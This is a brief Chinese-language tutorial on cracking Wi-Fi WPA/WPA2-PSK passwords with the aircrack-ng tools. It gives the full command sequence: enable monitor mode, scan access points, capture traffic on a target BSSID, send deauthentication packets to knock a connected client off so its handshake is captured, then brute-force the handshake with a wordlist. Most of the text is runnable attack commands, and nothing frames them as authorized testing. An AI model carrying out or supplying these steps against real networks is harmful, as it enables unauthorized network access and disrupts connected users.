参考:http://www.jianshu.com/p/d4da13258f35
Airodump-ng 获取 AP 的 MAC 信息,连接信息以及是否握手成功。 Aircrack-ng 支持基于 802.11 协议的 WEP 和 WPA/WPA2-PSK 密码破解 Aireplay-ng 强行向目标 AP 发送数据包 Airmon-ng 开启无线网卡的监视模式 Wordlists.txt 字典包
iwconfig #确认网卡信息 表示设备WLAN0待命并且当前模式为被管理(Managed) airmon-ng start wlan0 #激活网卡至监视模式 图中出现错误导致监听不能开启,采用提示办法airmon-ng check kill杀掉进程 然后再输入命令,此时正常开启 iwconfig #再次查看网卡信息,此时为监听模式(mode=Monitor) airodump-ng wlan0mon #获取附近AP 信息 airodump-ng --bssid BSSID -c CH -w 文件位置 wlan0mon #-w 是抓的包输出目录,注意加-c,不然airodump-ng会每个频道都会试,一直乱跳,下一步工作不好进行 aireplay-ng -0 10 -a BSSID -c STATION wlan0mon #-0 表示DeAuth模式,10表示攻击次数,-c是第3 步中的得到的STATION,即已连接上的客户端MAC 地址。 只要发现第1 步中右上角出现了 handshake: AP的MAC(BSSID),就可以 CRTL+C 停止。 aircrack-ng -w 字典文件 cap文件 成功
ifconfig wlan0mon down iwconfig wlan0mon mode managed ifconfig wlan0mon up 此时将监听模式改为managed模式